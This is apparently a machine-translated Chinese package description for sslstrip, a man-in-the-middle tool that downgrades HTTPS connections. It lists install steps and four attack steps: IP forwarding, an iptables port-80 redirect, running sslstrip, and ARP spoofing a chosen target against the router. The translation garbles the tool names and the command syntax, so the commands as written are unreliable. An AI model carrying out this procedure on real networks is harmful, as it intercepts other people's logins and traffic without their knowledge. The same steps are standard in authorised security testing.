一个实现moxie marlinspike的https剥离攻击的mitm工具。
sslstrip的Python项目详细描述
SSLRAPD是实现莫氏马林斯派克SSL剥离的一种MITM工具。 攻击。
它需要Python2.5或更新版本,以及“twisted”Python模块。
- 安装:
- pip安装sslstrip
- 运行:
sslstrip可以从源库运行,而无需安装。 只需以非根用户的身份运行“python sslstrip.py-h”即可获得 命令行选项。
实现此功能的四个步骤(假设您运行的是Linux) 是:
- 将计算机切换到转发模式(以根用户身份): echo“1”>;/proc/sys/net/ipv4/ip_转发
- 设置iptables以拦截http请求(以根用户身份): iptables-t nat-a prerouting-p tcp–目标端口80-j重定向–到端口<;yourlistenport>;
- 使用命令行选项运行sslstrip(见上文)。
- 运行arpsoof将流量重定向到您的计算机(以根用户身份): arpsoof-i<;YourNetworkdDevice>;-t<;YourTarget>;<;TheroutersIPaddress>;
- 更多信息:
- http://www.thoughtcrime.org/software/sslstrip/